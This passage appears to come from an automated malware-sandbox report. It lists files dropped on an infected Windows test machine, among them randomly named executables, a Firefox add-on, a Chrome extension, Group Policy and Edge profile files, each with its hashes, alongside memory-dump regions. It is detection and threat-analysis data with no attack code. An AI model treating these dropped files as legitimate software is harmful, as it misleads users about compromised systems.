SHA256 2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512 dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff

memory/1076-264-0x0000000000400000-0x000000000063B000-memory.dmp

memory/1076-266-0x0000000000400000-0x000000000063B000-memory.dmp

memory/3836-265-0x00000000014D0000-0x00000000014D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

MD5 749073f260169957a61c1b432f666857
SHA1 bd7868f93e93c73fedd39f1a2877c474f4f9c37d
SHA256 2c8153f6f636f81331153a773085374ee43e599a141acfd005ae9834070fea45
SHA512 1a2a48c9081cb52d2b0a8bf83b3f4f699ca1145c31f65c3392fb0a5d71c796615f6ecca7e32a527b4b32953ddaab77d988c7c077c6691404cef5e5ddae818013

memory/4404-285-0x000001371C910000-0x000001371C91A000-memory.dmp

memory/3016-286-0x0000000007CC0000-0x0000000007E82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/3016-296-0x00000000083C0000-0x00000000088EC000-memory.dmp

memory/916-301-0x0000000000330000-0x0000000000927000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe

MD5 2de14d82238bf5395e0b95e551ab8e00
SHA1 f9c7f00ad7c624d190e06cda3c5adf02bb207074
SHA256 aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4
SHA512 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a

memory/4404-325-0x000001371E5C0000-0x000001371E5C6000-memory.dmp

memory/4404-326-0x00000137376C0000-0x000001373771C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{91B4AD75-0225-46aa-B539-7266522D83AB}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

memory/1868-351-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1152-356-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/4028-357-0x0000000000D70000-0x0000000001243000-memory.dmp

C:\Users\Admin\Pictures\T1KOIAuM0Pktt1IF398MlNRD.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe

MD5 cd4acedefa9ab5c7dccac667f91cef13
SHA1 bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256 dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA512 06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1

C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe

MD5 ed818dde26cfadc733c54f3f0f52fe34
SHA1 753e8018af236d4c8b2889b00aefe6bc46aee725
SHA256 0ab28127aad4d3ca04188077d590830b22b540859e7ba12216366c129a9df220
SHA512 50f9c2577f33f71df47755672ac07faca6ded2252e516057ee13534c8800c0a31a12e242000e9ceff5b2b441d319fd0082b7f288a837a23e031be0ab8c3cba3e

C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe

MD5 c6ea25255fd7c184d6dfb684ac82e351
SHA1 427e8c51fe469ac97d0150e7eeef493fe58618fa
SHA256 c1f22a60d29d14993576ee6093144960dd3b0c181569fd41c913b8d38ff3debd
SHA512 1ca511225bbd33073749ba7fa0792ced0c12d3516a57bff4f04eba6e4287593a4b76812d0249db61848c5fcc5b892d5363684800e8d46bfc11159f2b0e4276a4

memory/1832-424-0x0000015C45BE0000-0x0000015C45BEA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Albany

MD5 7290b064b7211ee58263434e7f3e5d06
SHA1 fabad9d3bcac72a0157daebc4d97441b15125a02
SHA256 4d3e9e90746157d6e091a3362f179641f73051fa4f8055c2af1e088584a508dc
SHA512 059a3f07ddd21eb50b60a83aea1eb4f446ec9b358d57a41259adb30038dfa38bbf5e5cb8d2b1baeb525f42bf9543d509d704629b924305358f6fb5b1097fb792

memory/916-547-0x0000000000330000-0x0000000000927000-memory.dmp

memory/1832-653-0x0000015C60B40000-0x0000015C60BA8000-memory.dmp

C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe

MD5 e99605f8de15e4ac43c1ac5c56c2b783
SHA1 5399b6e0623ce3f4e979014ce2fc072896bb6e56
SHA256 b42b24d0549e201cf0727f1edeaacbebfed2eeec6af9eff6bdea4bf4ab0a1918
SHA512 83c2085df6d7434e0fadda727bf16fd55daaff1a3ab14960d5086d9e8e6e19c7ca2127fe9feb917ae5c68584462c18bbb7ac345a4f3ee521b6cd9a9274ba4c25

memory/2152-822-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1600-975-0x00007FF6E7940000-0x00007FF6E8860000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe

MD5 f74fcc245dd45e9616656097665698b9
SHA1 dd2ad813cd1da59bcb19d6b81dbd60215b9bb987
SHA256 d1654381b2f43e13d88f2decbabe9695d09467fc26762f72f5dab3f43b0bd96e
SHA512 bead6f116b6d0d683389f323240acfcf717ae98b9c5d86c77c5d57dcca084abed6ccb6a4cc31b09a43bb368450a0645643200b65ab4260321c3f2b3b2d98a509

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sterling

MD5 814b8201e185c434058c055a793ab804
SHA1 827cb278f6c32e2ccadcaf1fabff3dfb1019b91a
SHA256 a6262fceaf69a64f87e9b9dcfe82510daec0d5c6a2fec436f4ac07201a283104
SHA512 44109b5be92fd79fe4fc45a1b8dae1675159010ff5a3dc70f239c7faecdc846e82156f79a9d97ce6e203552d23b0ba52b90fe987248f8ac2776a70b7042fc9c2

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Emily

MD5 1f1dd062a7e1ded44a2f746b781619b4
SHA1 d089bfe93e6f088c8e585818d6dca6cb27e66daf
SHA256 af4cd6f288b8c9f5a71aaad2d3a53cf401b1041f9d0af17f37c86b7856eb1722
SHA512 7884561ea6f0f09082eeb1e0123f86db5cf5627096d8da2cb8299fe9a4e8eae72b76292fcdab59e365a178fea99609a8c52db8179990cacf3b2e6f5db340c038

memory/916-1040-0x0000000000330000-0x0000000000927000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Liverpool

MD5 20bfd63909be2a55c24e6e49e41d068a
SHA1 b231edf1209dae9ab2aaf7524a4746581cc08c0e
SHA256 0df88be6103d01fbc1c6788b0f90e9877cd9e898f899951aaba17d70d73c2781
SHA512 11c2eee0362c99db3ff8f1b413387d715af69e3ec7f918c9ac3931bd4a916810e7863259292793a2a2a73eb97b1122fe972db89d68e0f5b9309a0e37e86a6830

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Third

MD5 9cd63a63b7f4e31ef4d14067f7b7abac
SHA1 14eb0b678d14c8c8c915b09bdaf21ac294cee453
SHA256 7ad6a8b7201478e74fe3b4e97cde8d83a73381fddcd9e92ede31994be786e948
SHA512 b9d956315e19d8c0d84c7d2f44d082c904802b991b4ea46e8e22ad5cef10d71b31da7b0361303d6edd1a05c2935d090b31326e8e64955f1bdf7cabaa8c9844cd

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Visual

MD5 9adbaeb3f3a2db3c3a8eeb0695e1fd27
SHA1 2d0eaed6f9fc9629b53fb2a9c8026411d1017f20
SHA256 9b340ec9cc90f634323bf17dd7cd637c4fcfa0ef8e99f075f7ff5bc16e23df1d
SHA512 79a7c4decbc50fbbf5c3e8912a2c777680782f9677faea37284ea27e83de7394cc5da6f3c0b080582bf50266f56e0ec253be65c573cee196993b9256213a33c7

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Rx

MD5 767e21ea885038dfac63e7bc24afd41f
SHA1 a5cf1fd7e07ea0cf708c056de5a6d1d3de65b33f
SHA256 762f98176ddd5df08f486c08d3e96748f7c26d3696112a6e0f9cdbbe16d39a27
SHA512 5ea5f9a04b29fadf77a4b71b98b77ddec498b835f95fe604c2ff9d21c15eda29d8ddc47f38a52354bb15e45a5a4dbfd649b8e3dd23adb24bb05cdaf04aa9b675

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sewing

MD5 ddd91dbbc6516ec6e2dc2d805ff2f4b8
SHA1 75e30f11e0f113cde5b5fe1fdb934c24266fee65
SHA256 9355ca9dc85697d9fcbdf8ad8bc683f53d655833a137149c58e88b88d483ed7f
SHA512 69376d03121516847d789a6091740d8ab2d12d211f8757da51ef7307a6c85bf9e8646dc1f377c7730da2f9da16624084619ff9b299453216f5c06960ec7dbffc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Df

MD5 5548048d3fa30e720d28e32e6de2b170
SHA1 95540bc39b7ae528171f2a2ed87c2cd49d1a8204
SHA256 0e75a4b5a51937f067d113268427c21d25e6ae43f62ccdded6df11e414e55279
SHA512 a41670977776e68205f2cb29a3aaf8714d6e8775bc9b77ee049d0b9b82c2ef439cab0f1d42dee131b00347ada1b8cc044075f58f050549b4b69d223a9dc2c4bc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Basic

MD5 d9be996166f9ef2572c6719e3ebf721e
SHA1 bd889e733d046ddfebe63bb7420c8c75311c0c61
SHA256 d345c73a3e73677254467bf11c977656adf50eb12af2c1066be971d028417105
SHA512 405adef1992f11bd9f28609ad8012f38b6bc2c3bbc855b63bc3fd016966c52ec44f4c52ec2746ac72c376a05b056ae3a8a6986448551c3b6ce1def7c8b6ab5b5

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Produces

MD5 38e856b6d414dc140ee435123acb217c
SHA1 131c4e370619e746cca8105e98eaa9b4cc13d99c
SHA256 44af9e2d096e009266250f0c1cf1f7a78278ab6510b41790fa30fb736b4ed4b0
SHA512 606ef10405c8a9389af6727ced5e65413fc0554c40c5f1b65dbc86215e9b73c340478d3aa1c850fac7c7cf3411b1bfc4cd0e9f00216c63b4f50a62f2014dc000

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Toolbox

MD5 357586b3b2b2885f95c38e5613084b4e
SHA1 93b1ab258d2df7e908353de64ab532e838671576
SHA256 a6d6c3e9294671e3f12b903a8960f096d136ae070ec372be1167def242b64f76
SHA512 6e0368f4f7de5d98eb5ee6b199abb830d0facb29d65422bdda55513efc1c22a2a3ca9b5fce5b4d30d7e5ece6c28bbbc598f30145c132f45f86e1b88024defdfe

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accredited

MD5 acca19dc2ccc50994258a816e8c31439
SHA1 40ccf9dab204569cef118dd200d3fe90f21b3a63
SHA256 e289f94b916861fd796ec001f718bc9502103747738d524827d76aba188b5242
SHA512 c00e1b9dc0adf7539bbb3a86462492f77865fc82f29a2f1cff472fc2a7684c8b73e76cadf6f048423928d00a3555120a487d3600b57ccdf3ef8618a787ae27c7

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Work

MD5 d2322148fea16b4e59c4aff5045edb94
SHA1 9bb259c9f7d4c8b74bda37d929017cbc462ced56
SHA256 7bf57ae312b7272763d9471bec53974343c4c7e3c8cc4b3a091f974aae4b92f5
SHA512 187e96bb93b385c3379875eafbef649ae091f1f49e638df93ad3dc819d3df5bb7254a95a07baf8bf1780b360cdd159f05d26b22c7ab0512c2257116539a42dc3

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Cloudy

MD5 b4e67ae79616fc04555a08b1ac219437
SHA1 fb062a5769860e80c896b9d2990a517f98cb6e9a
SHA256 13d3dfb8de15ae95bf3747318a6f14a0b229e6f9f71f43ba72bcf7e16ceb695b
SHA512 5cc9606c488055374f70b9822df01277ac39640ddacd52c465ee18b58e7223bd99900bcef3dbf02280ac5d664631e86bcde0591e7aef99498f456bfebd6ffae1

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Command

MD5 9fde6ca656f07f93012fe2ada84df07f
SHA1 c8d590380f9276ab86e87d80857767def4cb8625
SHA256 8350dbaafb0768c1858a20e55312f574d764a77a0d81b8d883a3422c161b2351
SHA512 16d43ca44e18c62ed044797568332d57c58489cb729bea528b0c5d5035699ec8b2f5bcc20fcfeb68a273b28c90979353d4d2c7625d8ccf43eceb149cb0abb585

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Botswana

MD5 72daa9860999eb0c7ab8729e5b7e1222
SHA1 23680f2c8a9341aa62e1d22c905f8404da7a06ea
SHA256 9ab45d6a0a920e937fef6e53ffba2c66c9e66ec7bf858d907091b95e7a6bfb2d
SHA512 e5e92aa59e18b85f035b450613177332b56d4d1b37b1d5246558dd2ead8e80deede634756ce6cad7d2e3b35a2713438209bf489a45886cee4b898af9fd619c55

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dead

MD5 be07dcfc960044abce2d820437d591f9
SHA1 74df641fb391081a146d04870915d9b1e047d702
SHA256 e5cf5503dc9628aa16fdabf138f08c746cbd784c9251c8929697ae693505b6a6
SHA512 0ab2898c9690d943ce2685e7890655bde5f863f1ceda73a88acb6c7e8638569250ba7770ce97302e49a82c7c8dd000795ebc5a28659f45694ffbd063e8d8b262

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Proof

MD5 746467a1740cf42ba997fb7867b25ab4
SHA1 b4a2cf85feafb9b4ca708e32e01e1b735d643d51
SHA256 e56fdff5624c275579811218738a4c6c1f8c452fa580724e40272d6ad807ee12
SHA512 95515327b72358c47c616b5515fd8e06072a338c7c82291a6c44178db3c79ddb3e99763f213f8e141bd2193758df715dd547fcc432a3e7e8f162e876016d64cb

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Rejected

MD5 66471c06ca153f3c73d898ccbd6ddfa4
SHA1 edd5909e1dbe51bf3e9c5642e8f01f22cc5aeb37
SHA256 e8c72ba4ac80dfbea78c7766f5a524c8d8dab14539a48f6b994d49a17631b76e
SHA512 eda8eed735abb8583b9c80a08e1be315026d2c30ea8087ee5cf69be4c3b761387ef1d7d9a174282651bc4c9ccfad48720c2c0b586cd695350a1d173f6886c529

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Fin

MD5 6a433bc039405ef66b941cf80229c28f
SHA1 6ddf3d88d22e877c410862f900de7ce9740ef408
SHA256 b6ac6eecca6d648b1419a2d6eb30e68a4051061647520e0068efc82157cc8758
SHA512 2b92c9e18607a6aab86c846fca6c8223db5b8eb9f5908300f03621af8739b9ad1ed56ceb8aa18d57f3604dc2841c721a6ff0d2c7bd25bdb1e682424339b662c6

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Quizzes

MD5 4561d9b0260c6b42c11b93a233692f76
SHA1 fb99d527c09ba27f90973779c0a990d02e38cbfd
SHA256 58caad9d458486a77a943df42c2f55a7412f3d471b1c5cffe19b929562a98a43
SHA512 a996ad2e7f60f0b0839669e5c0a9bb19f90b01ceb1cf4f655f47f778eb17c254e2fcb2345bfaa28b2abc2092152f3817767ac37c8557d79355d2effd5b3e4d94

memory/4028-1039-0x0000000000D70000-0x0000000001243000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

MD5 c09ff1273b09cb1f9c7698ed147bf22e
SHA1 5634aec5671c4fd565694aa12cd3bf11758675d2
SHA256 bf8ce6bb537881386facfe6c1f9003812b985cbc4b9e9addd39e102449868d92
SHA512 e8f19b432dc3be9a6138d6a2f79521599087466d1c55a49d73600c876508ab307a6e65694e0effb5b705fdecdd0e201f588c8d5c3767fe9ae0b8581c318cadac

memory/2152-1152-0x0000000006210000-0x00000000062AC000-memory.dmp

memory/636-1194-0x0000021248990000-0x00000212489B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcvwvkaa.lo2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1152-1200-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/3912-1212-0x0000000002D80000-0x0000000002DB6000-memory.dmp

memory/3912-1213-0x0000000005930000-0x0000000005F5A000-memory.dmp

memory/3912-1214-0x00000000058F0000-0x0000000005912000-memory.dmp

memory/3912-1215-0x0000000005FD0000-0x0000000006036000-memory.dmp

memory/3912-1224-0x0000000006180000-0x00000000064D7000-memory.dmp

memory/3912-1225-0x0000000006580000-0x000000000659E000-memory.dmp

memory/3912-1226-0x00000000065C0000-0x000000000660C000-memory.dmp

memory/4028-1227-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/916-1228-0x0000000000330000-0x0000000000927000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

memory/3912-1257-0x0000000006A60000-0x0000000006A7A000-memory.dmp

memory/3912-1256-0x00000000077F0000-0x0000000007886000-memory.dmp

memory/3912-1258-0x0000000006AF0000-0x0000000006B12000-memory.dmp

memory/2420-1261-0x0000000005ED0000-0x0000000006227000-memory.dmp

memory/2420-1270-0x0000000006990000-0x00000000069DC000-memory.dmp

memory/2420-1271-0x0000000007D00000-0x000000000837A000-memory.dmp

memory/5072-1272-0x0000000010000000-0x00000000105CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

MD5 e817cc929fbc651c5bdab9e8cca0d9d9
SHA1 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f
SHA256 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282
SHA512 a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

memory/3376-1292-0x0000000000630000-0x0000000000870000-memory.dmp

memory/3376-1293-0x00000000052C0000-0x00000000054DC000-memory.dmp

memory/3376-1294-0x0000000006610000-0x000000000682E000-memory.dmp

memory/3376-1304-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1320-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1322-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1318-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1316-0x0000000006610000-0x0000000006828000-memory.dmp

memory/2152-1458-0x00000000061E0000-0x00000000061EC000-memory.dmp

memory/3376-1314-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1309-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1310-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1306-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1324-0x0000000006610000-0x0000000006828000-memory.dmp

memory/3376-1303-0x0000000006610000-0x0000000006828000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c705388d79c00418e5c1751159353e3
SHA1 aaeafebce5483626ef82813d286511c1f353f861
SHA256 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512 c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

memory/3376-6215-0x0000000006AE0000-0x0000000006B2C000-memory.dmp

memory/3376-6214-0x0000000006A80000-0x0000000006AD8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0d84d1490aa9f725b68407eab8f0030e
SHA1 83964574467b7422e160af34ef024d1821d6d1c3
SHA256 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512 f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 940f5df4cd8d5a214198767c3bd2bad6
SHA1 de5888804357ae033ef75cee371c445e48a158d1
SHA256 20ff572b91587f802e6190277673d25a9ebe52a584c09cf0a07f0bba4bfc4edf
SHA512 1c3bbf87907a6f9eedbd1d729e858c75c714e2c7e69ca8a0f1c897ef1e48916239f6ab6f86018808201fc145b2c4a3040f58773b75bae25ae71eef3ad9aee483

memory/3760-6283-0x0000000005140000-0x0000000005497000-memory.dmp

memory/3760-6291-0x00000000055E0000-0x000000000562C000-memory.dmp

memory/5708-6292-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/5372-6295-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/5708-6297-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/5372-6299-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/3340-6321-0x0000000005C70000-0x0000000005CBC000-memory.dmp

memory/3340-6323-0x0000000006050000-0x0000000006096000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fcc6ff235c86baedaacfdf8bef00d821
SHA1 f7665d242af03125e86b90a0d97d4e377aafceeb
SHA256 2d207e6eba5f4dd3354c70fc9336b6ecf149551c5aa1823367e6c36090e80f6f
SHA512 67d75ec1eee6c8920fcbd0af40b304306b6979bfe780bba0d9a4885ac08b14cac57f36353fe72d720e8646224edc18753e72a2f39377398d758038b000f4543c

memory/3340-6340-0x0000000006FA0000-0x0000000006FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1b7230d7f9cfab5f263434e0afeae3fa
SHA1 90e80511427d50def6811a8c499858b62e7a0390
SHA256 225248ef362f91d0c7e86327335e3216d13b683b963a421f8d2eb83f5dde3a7a
SHA512 4d600dc5eb5d49cecf1cb2d12d6df6d1984303f63af5089433e6527a8a6fc6b0bdf441a45517c5442de733078254bd6363290a50bb722c373ee8b2cdc8007072

memory/3340-6350-0x0000000007320000-0x0000000007336000-memory.dmp

memory/5936-6361-0x0000000006D50000-0x0000000006D84000-memory.dmp

memory/5936-6362-0x000000006F4E0000-0x000000006F52C000-memory.dmp

memory/5936-6371-0x0000000006D90000-0x0000000006DAE000-memory.dmp

memory/5936-6372-0x0000000006DC0000-0x0000000006E64000-memory.dmp

memory/5936-6377-0x0000000007060000-0x000000000706A000-memory.dmp

memory/5936-6380-0x0000000007200000-0x0000000007211000-memory.dmp

memory/5196-6390-0x000000006F4E0000-0x000000006F52C000-memory.dmp

memory/5196-6400-0x0000000007A40000-0x0000000007A51000-memory.dmp

memory/3340-6411-0x0000000002290000-0x00000000022A6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a724fc861874ee09962885e5979ae51b
SHA1 962513b9afc97ae42ce0655a84bde2424b77bc98
SHA256 26de69f343630056b79798533c767ef54ea2babfa6802028fb138454304cb17b
SHA512 79c27f8b758e6139128fd4392b786591ee8ba238081ac24650af93ec7e432e69dc6236648da6e8cb732733f5b905577c3c822eea4620d41a74cd9775e0678c9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 67df09705539dab3035f43ce273e3296
SHA1 90a887f9cb1fa9c539a1c10a7f7dfcc11e66f220
SHA256 8cfa57599b4a76375d381932ea8a7028ec30494ae1563a9ecc337ff9b66679de
SHA512 39d9e8d626ea612a87d8e73051d5b7e6ade5162d72fb24f12c4a6bca192b4746ec8a4d71f6b33696ba6b4824aa0da37fc6a2acaf1c187a9c4a7a3b3392693573

memory/3376-6473-0x0000000006C80000-0x0000000006CD4000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 619bfdec43a0c21c19330d0aa9da6141
SHA1 ff1a8a0f4aa32a0bbe4b4a4c09e380640bca17b6
SHA256 79ee19deee41f4c68a6f0fb08ad2b58a0e32b63f1477b00446ce763199ec955f
SHA512 f19dec74652eb7888533705d576ebb19d9289a78ec07b3bcec2cdf9e9e11a230e615bf8ca7a93425da5358929f1ed3e544f3e04be87f55811110cc5289133c42

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
